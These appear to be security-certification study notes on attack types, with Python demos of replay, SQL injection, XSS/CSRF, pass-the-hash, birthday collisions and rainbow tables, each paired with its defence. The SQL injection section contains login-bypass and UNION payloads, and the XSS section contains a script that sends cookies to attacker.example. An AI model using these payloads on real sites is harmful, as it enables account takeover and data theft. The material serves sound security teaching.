Module 2. Comparing and Contrasting Attack Types

Social Engineering
A social engineer is someone who is skilled at asking seemingly harmless or unimportant questions to gather information over time, piecing together details that no single target would consider sensitive.
Some typical social engineering attacks are:

Phishing
Some types of phishing are:
- Phishing: An attack via electronic communications (typically e-mail) posing as someone trustworthy, usually to harvest credentials or deliver malware.
- Spear Phishing: A targeted attack appearing to come from a trusted source, typically within the victim's own company and from someone in a position of authority.
- Whaling: Spear phishing aimed at high-profile targets such as business executives.

Vishing
Voice phishing: using social engineering techniques over the phone to obtain information or to get the victim to take an action (the in-person equivalent is covered under impersonation below).
Attackers pose as a legitimate company, a repair person, security personnel or someone else the victim would trust, and may claim to be internal or external to the company.

Tailgating
Following someone into a building or badged area without presenting credentials. This works because people want to be helpful; be aware of people who try to look like they belong, or who carry a lot of items so that someone will hold the door for them.

Impersonation
As well as impersonating a person (in person, by phone or by e-mail), there is a technical form: an attacker captures packets, alters them, and places them back onto the network so that they look like legitimate traffic.
Sequencing helps mitigate this: if the receiver tracks sequence numbers and timestamps it can discard packets that arrive out of order, that duplicate a sequence number already seen, or that arrive after a timeout period, forcing a legitimate sender to retransmit rather than accepting the attacker's copy.

Dumpster Diving
Going through rubbish bins for discarded material that could reveal sensitive information (invoices, org charts, printed credentials).
Documentation that contains sensitive or personally identifiable information should be disposed of securely, for example by shredding.

Shoulder Surfing
Watching over someone's shoulder while they enter sensitive information, such as a password or PIN, into a web page or application.

Hoaxes
A fabricated story or false warning (a fake virus alert, for example) designed to trick the target into taking an action or revealing sensitive information. The pretext may be someone acting as a remote technician or employee, an interested party seeking employment, or an angry customer filing a complaint.

Watering Hole Attack
An attacker identifies a less secure third-party site that they have deduced company employees are likely to visit, then compromises that site so that it serves malware to those visitors.

Principles (Reasons for Effectiveness)

Authority
The bad actor appears to know what they are talking about, or claims special knowledge about the company or a senior role within it; that apparent position of power makes the target less likely to question the request.

Intimidation
The actor threatens negative consequences, such as releasing sensitive information or reporting the target to management, unless the target complies.

Consensus/Social Proof
People are more likely to act when they believe they are in alignment with the larger group ("everyone else in your department has already done this").

Familiarity/Liking
People prefer to deal with, use or buy things they are already familiar with or like. An attacker can establish a common contact or friend, or simply be pleasant and helpful, so that the target's trust goes up.

Trust
People are more likely to act when they trust the person or the situation; an attacker builds that trust over several interactions before making the real request.

Scarcity/Urgency
Tactics to elicit action by making the target think they must act quickly, for example to obtain a special deal or to avoid having an account closed, so that they do not stop to verify.

Application/Service Attacks

DDoS
A large-scale denial of service attack launched from many sources at once. It can have the following components:
- Botnets: a collection of compromised hosts that can initiate the attack, spread all over the internet, creating the distributed part of the attack.
- Bot Herders: the operators who infect vulnerable computers to add them to their botnet and direct its activity.
- Command and Control (C&C, C2) servers: the infrastructure the bot herder uses to issue instructions to the botnet.

Replay Attack
Capturing legitimate packets (for example an authentication exchange) and re-sending them onto the network later, with or without modification, so that the receiver accepts them as a fresh, valid transmission.
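The sequence-number and timeout mitigation described under Impersonation, applied to the replay attack above, as an added example (this is not code from the original notes). The shared key, the message layout `seq|timestamp|payload|mac` and the 30-second freshness window are assumptions made for the example; the sample messages are constructed inline.

```python
import hashlib
import hmac

# Assumed shared key between sender and receiver (constructed for this example).
SHARED_KEY = b"example-shared-key"
REPLAY_WINDOW_SECONDS = 30


def build_message(seq, timestamp, payload, key=SHARED_KEY):
    """Sender side: seq|timestamp|payload, authenticated with an HMAC over all three."""
    body = f"{seq}|{timestamp}|{payload}".encode()
    tag = hmac.new(key, body, hashlib.sha256).hexdigest()
    return body + b"|" + tag.encode()


class Receiver:
    """Receiver that remembers the highest sequence number accepted and rejects
    duplicates, out-of-order packets, stale timestamps and tampered bodies."""

    def __init__(self, key=SHARED_KEY, window=REPLAY_WINDOW_SECONDS):
        self.key = key
        self.window = window
        self.last_seq = -1

    def accept(self, message, now):
        body, _, tag = message.rpartition(b"|")
        expected = hmac.new(self.key, body, hashlib.sha256).hexdigest()
        # Constant-time compare: an altered body (or tag) fails here.
        if not hmac.compare_digest(expected.encode(), tag):
            return "rejected: bad MAC"
        seq_s, ts_s, payload = body.decode().split("|", 2)
        seq, ts = int(seq_s), float(ts_s)
        if seq <= self.last_seq:
            return "rejected: replayed or out-of-order sequence"
        if now - ts > self.window:
            return "rejected: stale timestamp"
        self.last_seq = seq
        return f"accepted: {payload}"


def demo():
    """Constructed exchange: one genuine message, then the three attacker variants."""
    rx = Receiver()
    t0 = 1_700_000_000.0
    m1 = build_message(1, t0, "transfer 100 to alice")
    results = []
    results.append(rx.accept(m1, now=t0 + 1))        # genuine message: accepted
    results.append(rx.accept(m1, now=t0 + 2))        # attacker replays the capture
    tampered = m1.replace(b"transfer 100", b"transfer 999")
    results.append(rx.accept(tampered, now=t0 + 3))  # altered copy: MAC no longer matches
    m2 = build_message(2, t0, "transfer 5 to bob")
    results.append(rx.accept(m2, now=t0 + 60))       # new sequence number but too old
    return results


if __name__ == "__main__":
    for line in demo():
        print(line)
```

The sequence number alone stops straight replays; the timestamp is what stops an attacker from holding a captured packet and replaying it after the receiver has been restarted (and so has forgotten the last sequence number).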

Man-In-The-Middle
The attacker positions themselves between two communicating parties (for example via ARP or DNS poisoning) and relays traffic between them. Unlike a replay attack the packets may simply be read and passed on unmodified; the attacker can also alter them in transit while each side believes it is talking directly to the other.

Buffer Overflow
An attack that causes a system or application to crash or behave unexpectedly. If an application does not check that the data being written to a buffer fits, the excess is written into adjacent memory. That memory may hold control data such as a return address, so attacker-supplied data can redirect execution and run code that normally would not be allowed to run.

SQL Injection
Modifying the SQL query that a web application builds from user input, typically by supplying input that contains SQL syntax. A vulnerable site may return data from the database that it should not (potentially including usernames and password hashes), crash, or in some cases give the attacker remote access.
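A worked illustration of the point above, added here and not taken from the original notes: a login query built by string formatting beside the parameterised form. The in-memory SQLite table, the user rows and the hash values are constructed for the example.

```python
import hashlib
import sqlite3


def sha256hex(s: str) -> str:
    return hashlib.sha256(s.encode()).hexdigest()


def make_db():
    """Constructed stand-in for the web application's user table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password_hash TEXT, role TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)", [
        ("alice", sha256hex("correct horse"), "admin"),
        ("bob", sha256hex("hunter2"), "user"),
    ])
    return conn


def login_vulnerable(conn, username, password_hash):
    """The query is assembled by string formatting, so the input is parsed as SQL."""
    query = (f"SELECT username, role FROM users WHERE username = '{username}' "
             f"AND password_hash = '{password_hash}'")
    return conn.execute(query).fetchall()


def login_safe(conn, username, password_hash):
    """Parameterised query: values travel separately from the SQL text, so quotes,
    comments or UNION in the input can never change the query's structure."""
    query = "SELECT username, role FROM users WHERE username = ? AND password_hash = ?"
    return conn.execute(query, (username, password_hash)).fetchall()


def demo():
    conn = make_db()
    bypass = "alice'--"                                      # comments out the password check
    tautology = "' OR '1'='1"                                # makes the WHERE clause always true
    exfil = "' UNION SELECT username, password_hash FROM users--"  # pulls other columns
    return {
        "legit": login_safe(conn, "alice", sha256hex("correct horse")),
        "vuln_bypass": login_vulnerable(conn, bypass, "wrong"),
        "vuln_dump_all": login_vulnerable(conn, tautology, tautology),
        "vuln_exfil_hashes": sorted(login_vulnerable(conn, exfil, "wrong")),
        "safe_bypass": login_safe(conn, bypass, "wrong"),
        "safe_tautology": login_safe(conn, tautology, tautology),
        "safe_exfil": login_safe(conn, exfil, "wrong"),
    }


if __name__ == "__main__":
    for name, rows in demo().items():
        print(f"{name}: {rows}")
```

The three payloads map onto the three outcomes in the text: `'--` bypasses authentication, the tautology returns every row, and `UNION` retrieves columns (here the password hashes) the query was never meant to expose. Against the parameterised version each payload is just a username nobody has.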

LDAP Injection
Similar to SQL injection, but targeting LDAP queries. When unvalidated input is placed into an LDAP search filter, the attacker can change the filter's logic and may retrieve user details from the directory service or bypass authentication checks.

XML Injection
Another form of injection, where untrusted input is placed into an XML document or query and alters its structure or meaning.

Cross Site Scripting (XSS) and Cross Site Request Forgery (XSRF)
In XSS the browser runs attacker-supplied script because it was served from a site the browser trusts (the attacker's input was echoed into the page unescaped). In XSRF the server performs an action because it received a request from a client it trusts: the victim's browser automatically attaches its session cookie to a request the attacker caused it to send.
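Both halves of the entry above in one added example (not code from the original notes): an unescaped comment renderer beside an escaped one for XSS, and a state-changing endpoint that accepts or rejects requests on a session-bound CSRF token. The session store, server secret, cookie value and the request dictionaries are constructed for the example and stand in for a real web framework.

```python
import hashlib
import hmac
import html

# Constructed server-side state: session cookie -> user, and a secret for token derivation.
SESSIONS = {"s3ss10n-c00k13": "victim"}
CSRF_SECRET = b"assumed-server-secret"


def render_comment_vulnerable(comment: str) -> str:
    """Echoes user input straight into the page; the browser executes any script in it."""
    return f'<p class="comment">{comment}</p>'


def render_comment_safe(comment: str) -> str:
    """Escapes the input so the browser renders it as text rather than markup."""
    return f'<p class="comment">{html.escape(comment, quote=True)}</p>'


def issue_csrf_token(session_cookie: str) -> str:
    """Token tied to the session. The real site embeds it in its own forms; an
    attacker's page cannot read it because of the same-origin policy."""
    return hmac.new(CSRF_SECRET, session_cookie.encode(), hashlib.sha256).hexdigest()


def handle_transfer(request: dict) -> str:
    """A state-changing endpoint. `request` models what the server sees: the cookie
    the browser attached automatically and the submitted form fields."""
    cookie = request.get("cookie_session", "")
    user = SESSIONS.get(cookie)
    if user is None:
        return "401 not logged in"
    token = request.get("form", {}).get("csrf_token", "")
    if not hmac.compare_digest(token, issue_csrf_token(cookie)):
        return "403 CSRF token missing or wrong"
    form = request["form"]
    return f"200 {user} transferred {form['amount']} to {form['to']}"


def demo() -> dict:
    payload = '<script>fetch("https://attacker.example/?c=" + document.cookie)</script>'
    cookie = "s3ss10n-c00k13"
    # Legitimate submission: the site's own form carried the token.
    genuine = {"cookie_session": cookie,
               "form": {"amount": "10", "to": "bob", "csrf_token": issue_csrf_token(cookie)}}
    # XSRF: the attacker's page makes the victim's browser submit this. The cookie
    # goes along automatically, but the attacker had no way to obtain the token.
    forged = {"cookie_session": cookie,
              "form": {"amount": "1000", "to": "attacker"}}
    return {
        "xss_vulnerable": render_comment_vulnerable(payload),
        "xss_safe": render_comment_safe(payload),
        "genuine": handle_transfer(genuine),
        "forged": handle_transfer(forged),
    }


if __name__ == "__main__":
    for name, value in demo().items():
        print(f"{name}: {value}")
```

The contrast is the point: the forged request is indistinguishable from a genuine one at the cookie level, which is why a cookie alone must never authorise a state change; the escaped comment shows that the same `<script>` text is harmless once the browser is told it is data.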

Privilege Escalation
Obtaining elevated privileges on the target, either vertically (from a normal user to administrator or root) or horizontally (taking over another user's account at the same level).

ARP Poisoning
The attacker sends out spoofed ARP replies so that other hosts associate the attacker's MAC address with another host's IP address (often the default gateway), then intercepts data intended for that host.

Smurf Attack (Amplification)
The attacker sends ICMP echo requests (pings) to a network's broadcast address with the source address spoofed to be the victim's IP address. Every host on that network replies to the victim, so a small amount of attacker traffic is amplified into a flood at the victim's machine.

DNS Poisoning
Manipulating the data in a DNS server's cache (or a client's hosts file) so that a legitimate name resolves to an attacker-controlled IP address.

Zero Day
A vulnerability that is exploited before the developer has a chance to issue a fix or patch, so defenders have had "zero days" to prepare.

Pass the Hash
Harvesting a user's password hash and using it directly to authenticate to a remote server or service, without ever needing the plaintext password. The hash is usually obtained from a compromised host (memory or the local credential store) or, less commonly, by capturing an authentication exchange on the network.
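An added example of why a stolen hash is enough (not code from the original notes). It models a challenge-response login in which the client proves knowledge of the credential hash rather than the password, which is the property pass-the-hash abuses. The protocol, the SHA-256-over-UTF-16LE hash (a stand-in for the NT hash, chosen because MD4 is not always available in Python builds), the user and the password are all constructed for the example.

```python
import hashlib
import hmac
import secrets


def password_hash(password: str) -> bytes:
    """Unsalted credential hash stored by the server (stand-in for the NT hash)."""
    return hashlib.sha256(password.encode("utf-16-le")).digest()


def compute_response(credential_hash: bytes, challenge: bytes) -> bytes:
    """The client's proof is keyed by the hash, not by the password."""
    return hmac.new(credential_hash, challenge, hashlib.sha256).digest()


class Server:
    def __init__(self, users: dict):
        self.users = users          # username -> credential hash
        self.pending = {}           # username -> outstanding challenge

    def challenge(self, username: str) -> bytes:
        c = secrets.token_bytes(8)
        self.pending[username] = c
        return c

    def verify(self, username: str, response: bytes) -> bool:
        c = self.pending.pop(username, None)
        h = self.users.get(username)
        if c is None or h is None:
            return False
        return hmac.compare_digest(compute_response(h, c), response)


def legitimate_login(server: Server, username: str, password: str) -> bool:
    """What a real client does: hash the typed password, then answer the challenge."""
    c = server.challenge(username)
    return server.verify(username, compute_response(password_hash(password), c))


def pass_the_hash(server: Server, username: str, stolen_hash: bytes) -> bool:
    """What the attacker does: skip the password step and answer with the dumped hash."""
    c = server.challenge(username)
    return server.verify(username, compute_response(stolen_hash, c))


def demo() -> dict:
    users = {"admin": password_hash("Correct-Horse-Battery")}   # constructed account
    server = Server(users)
    stolen = users["admin"]        # attacker dumped this from a compromised host
    return {
        "legit": legitimate_login(server, "admin", "Correct-Horse-Battery"),
        "wrong_password": legitimate_login(server, "admin", "guess"),
        "pass_the_hash": pass_the_hash(server, "admin", stolen),
    }


if __name__ == "__main__":
    print(demo())
```

Because the server's check only ever uses the hash, the hash is a password-equivalent: cracking it is unnecessary. Contrast a form login that sends the plaintext password over TLS and hashes it server-side, where a dumped hash would still have to be cracked before it could be used.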

Clickjacking
Tricking the user into performing unintended actions by placing an invisible or disguised element (such as a transparent frame) over what the user thinks they are clicking.

Session Hijacking
The items used to validate a user's session (session cookies or tokens) are captured and reused by a malicious person, for example through a man-in-the-middle attack or sidejacking (sniffing session cookies on an unencrypted network).

Typo Squatting and URL Hijacking
Registering domain names that are misspellings of popular domains. The fraudulent sites at these domains are then used to capture users' details.

Shimming
Application compatibility shims (stored in shim databases) sit between an application and the operating system and intercept API calls; an attacker can abuse them to inject code or apply malicious patches to a legitimate program.

Refactoring
Modifying an application's source code without changing its underlying functionality. In an attack context this is done to malicious code so that it keeps its behaviour but no longer matches known signatures.

IP/MAC Spoofing
Masquerading as another host by using its IP or MAC address, for example to bypass address-based filtering or to receive traffic meant for that host.

Wireless Attacks

Replay Attacks
Sniffing the wireless network to capture packets, then (with or without modification) re-transmitting them over the air so that the access point or client accepts them as legitimate.

IV Attack
Initialization Vector attack. Older, weaker encryption such as WEP used a short IV (24 bits) that repeats fairly quickly on a busy network; by collecting enough packets with repeated IVs an attacker can recover the key and gain access. This is how WEP networks are cracked.

Rogue Access Points
Unauthorised access points that can be used to obtain sensitive information from clients that connect to them. An evil twin is a rogue access point that uses the same SSID as a legitimate AP so that clients connect to it by mistake.

WPS Attack
Wi-Fi Protected Setup offers an easy push-button or PIN connection option. The PIN is 8 digits, but the last digit is a checksum and the protocol confirms each half of the PIN separately, so only about 11,000 guesses are needed and it can be brute forced in a matter of hours.

Bluejacking
Sending unauthorised messages or data to a victim's Bluetooth device, for example a vCard containing a message, using the OBEX (OBject EXchange) protocol.

Bluesnarfing
Pulling data (contacts, messages) from a victim's Bluetooth device without their knowledge.

NFC
Near Field Communication can be abused to steal data from, or interact with, a device that is within a few centimetres of the attacker's reader.

Disassociation
An attacker can create a DoS scenario by sending spoofed disassociation (or deauthentication) frames, causing hosts to disconnect from the access point.

Cryptographic Attacks

Brute Force
An attempt to defeat encryption or authentication by trying every possible password, passphrase or key until one works.

Dictionary Attack
Trying words from a dictionary or another defined set of likely candidates rather than every possible combination.

Birthday Attack
A brute force attack that relies on the cryptographic phenomenon of hash collisions. Because any pair of inputs may collide, finding some pair with the same hash takes roughly the square root of the number of possible outputs (about 2^(n/2) attempts for an n-bit hash) rather than the 2^n needed to hit one specific output.
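The square-root effect above, carried through in code as an added example (not from the original notes). SHA-256 is truncated to 32 bits so that the search is feasible on a laptop: a collision between any two random messages turns up after tens of thousands of hashes, while a search for one specific 32-bit output is given a budget of 100,000 tries and runs out. The truncation width, seeds and budget are choices made for the example.

```python
import hashlib
import math
import random


def short_hash(msg: bytes, bits: int) -> int:
    """Truncate SHA-256 to `bits` bits so the search space is small enough to demo."""
    return int.from_bytes(hashlib.sha256(msg).digest(), "big") >> (256 - bits)


def find_collision(bits: int, seed: int = 1):
    """Birthday attack: hash random messages until any two share an output."""
    rng = random.Random(seed)
    seen = {}
    tries = 0
    while True:
        msg = rng.getrandbits(64).to_bytes(8, "big")
        h = short_hash(msg, bits)
        tries += 1
        other = seen.get(h)
        if other is not None and other != msg:
            return other, msg, tries
        seen[h] = msg


def find_preimage(target: int, bits: int, limit: int, seed: int = 2):
    """Brute force one specific output value; gives up after `limit` attempts."""
    rng = random.Random(seed)
    for tries in range(1, limit + 1):
        msg = rng.getrandbits(64).to_bytes(8, "big")
        if short_hash(msg, bits) == target:
            return msg, tries
    return None, limit


def expected_tries(bits: int):
    """Expected work: about sqrt(pi/2 * 2^n) hashes for a collision vs 2^n for a preimage."""
    return math.sqrt(math.pi / 2 * 2 ** bits), float(2 ** bits)


def demo(bits: int = 32, preimage_limit: int = 100_000) -> dict:
    m1, m2, collision_tries = find_collision(bits)
    target = short_hash(b"target document", bits)   # constructed target
    preimage, spent = find_preimage(target, bits, preimage_limit)
    exp_collision, exp_preimage = expected_tries(bits)
    return {
        "m1": m1, "m2": m2, "collision_tries": collision_tries,
        "expected_collision_tries": exp_collision,
        "preimage": preimage, "preimage_tries_spent": spent,
        "expected_preimage_tries": exp_preimage,
    }


if __name__ == "__main__":
    r = demo()
    print(f"collision after {r['collision_tries']} tries "
          f"(expected ~{r['expected_collision_tries']:.0f}): {r['m1'].hex()} {r['m2'].hex()}")
    print(f"preimage: {r['preimage']} after {r['preimage_tries_spent']} tries "
          f"(expected ~{r['expected_preimage_tries']:.0f})")
```

The same arithmetic is why a 128-bit hash such as MD5 offers only about 64 bits of collision resistance, and why a signature scheme that lets the attacker choose both documents (for example a benign and a malicious contract) needs a hash at least twice as wide as the security level wanted.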

Rainbow Tables
Precomputed tables of cryptographic hashes (stored as chains to save space) that let an attacker look up the plaintext for a captured hash instead of computing it. Salting each hash with a random value defeats them, since a separate table would have to be built for every salt.
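A miniature rainbow table as an added example (not code from the original notes), so the chain structure and the lookup procedure are visible rather than just described. The keyspace is 4-digit PINs, the hash is SHA-256, the reduction function and chain length are chosen for the example, and the table only covers the PINs that fall on its chains; the final lookup shows the same table failing against a salted hash.

```python
import hashlib

KEYSPACE = 10_000        # constructed toy keyspace: 4-digit PINs
CHAIN_LENGTH = 50


def H(pin: str) -> str:
    return hashlib.sha256(pin.encode()).hexdigest()


def reduce(h: str, step: int) -> str:
    """Map a hash back into the PIN keyspace. Using a different reduction at each
    step is what makes this a rainbow table rather than a plain hash chain."""
    return f"{(int(h[:12], 16) + step) % KEYSPACE:04d}"


def chain_pins(start: str) -> list:
    """The PINs p0..p(t-1) whose hashes a chain beginning at `start` covers."""
    pins = [start]
    for step in range(CHAIN_LENGTH - 1):
        pins.append(reduce(H(pins[-1]), step))
    return pins


def build_table(starts) -> dict:
    """Store only endpoint -> start; the intermediate values are recomputed on lookup."""
    table = {}
    for start in starts:
        pins = chain_pins(start)
        endpoint = reduce(H(pins[-1]), CHAIN_LENGTH - 1)
        table[endpoint] = start
    return table


def lookup(table: dict, target_hash: str):
    """Recover the PIN whose hash is `target_hash`, if some chain covers it."""
    for i in range(CHAIN_LENGTH - 1, -1, -1):
        # Assume the target is the hash at position i of a chain; roll to the endpoint.
        pin = reduce(target_hash, i)
        for step in range(i + 1, CHAIN_LENGTH):
            pin = reduce(H(pin), step)
        start = table.get(pin)
        if start is None:
            continue
        # Rebuild that chain and confirm: endpoint matches can be false alarms.
        for candidate in chain_pins(start):
            if H(candidate) == target_hash:
                return candidate
    return None


def demo() -> dict:
    table = build_table(f"{i:04d}" for i in range(0, KEYSPACE, 100))
    covered = chain_pins("0300")[3]          # a PIN known to lie on a chain
    salt = "a9f3"                            # constructed per-user salt
    return {
        "table_entries": len(table),
        "recovered": lookup(table, H(covered)),
        "expected": covered,
        "salted_lookup": lookup(table, H(salt + covered)),
    }


if __name__ == "__main__":
    print(demo())
```

The table holds 100 endpoints but can answer for up to 5,000 PINs, which is the space-for-time trade the technique offers; the salted lookup returns nothing because `H(salt + pin)` is never the hash of any bare PIN on a chain, so the attacker would have to build a fresh table for that salt.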

Online vs. Offline

Collision Attack
An attack that finds two different inputs that produce the same hash output.

Downgrade Attack
Forcing a system to negotiate a weaker protocol version or cipher than it supports, typically by exploiting the fallback mechanisms kept for compatibility with legacy systems.

Known Plaintext / Ciphertext
If the attacker knows both a plaintext and its corresponding ciphertext, the pair can be used to recover the key or to find weaknesses in the cipher (a hash function has no key to recover, so this attack applies to encryption rather than hashing).

Weak Implementations
Cryptography is only as strong as its weakest link.
- Don't use weak or deprecated algorithms: MD5 and SHA-1 for hashing, or DES and RC4 for encryption.
- Use NIST approved algorithms such as AES (NIST Special Publication 800-57 Part 1, Recommendation for Key Management, lists the approved algorithms and key sizes). TDEA (triple DES) also appears there, but NIST has since deprecated it and it should not be used in new designs.